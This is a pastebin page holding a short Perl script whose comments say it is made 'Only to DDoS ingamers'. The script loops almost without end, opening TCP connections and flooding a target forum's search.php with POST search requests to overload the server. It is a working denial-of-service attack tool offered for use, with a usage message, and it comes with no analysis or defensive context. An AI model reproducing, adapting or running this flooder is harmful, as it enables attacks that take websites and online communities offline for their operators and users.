Guest

Untitled

By: a guest on Jan 28th, 2012  |  syntax: None  |  size: 1.49 KB  |  hits: 12  |  expires: Never
download  |  raw  |  embed  |  report abuse
Copied
  1. #!"c:\perl\bin\perl.exe"
  2. #########################
  3. #    Made by Yojo    #
  4. # Only to DDoS ingamers #
  5. #########################
  6. print "\t Made by Katsumi \n";
  7. print "\t Only DDoS Ingamers \n";
  8.  
  9.  
  10. use Socket;
  11. if (@ARGV < 2) { &usage; }
  12. $rand=rand(10);
  13. $host = $ARGV[0];
  14. $dir = $ARGV[1];
  15. $host =~ s/(http:\/\/)//eg;
  16. for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)
  17. {
  18. $user="h4x0r".$rand.$i;
  19. $data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
  20. $len = length $data;
  21. $foo = "POST ".$dir."search.php HTTP/1.1\r\n".
  22. "Accept: */*\r\n".
  23. "Accept-Language: en-gb\r\n".
  24. "Content-Type: application/x-www-form-urlencoded\r\n".
  25. "Accept-Encoding: gzip, deflate\r\n".
  26. "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
  27. "Host: $host\r\n".
  28. "Content-Length: $len\r\n".
  29. "Connection: Keep-Alive\r\n".
  30. "Cache-Control: no-cache\r\n\r\n".
  31. "$data";
  32. my $port = "80";
  33. my $proto = getprotobyname('tcp');
  34. socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
  35. connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
  36. send(SOCKET,"$foo", 0);
  37. syswrite STDOUT, "|" ;
  38.  
  39. }
  40. print "\n\n";
  41. system('ping $host');
  42. sub usage {
  43. print "\tusage: \n";
  44. print "\t$0 <host> </dir/>\n";
  45. print "\tex: $0 127.0.0.1 /forum/\n";
  46. print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
  47.  
  48.  
  49.  
  50.  
  51. exit();
  52. };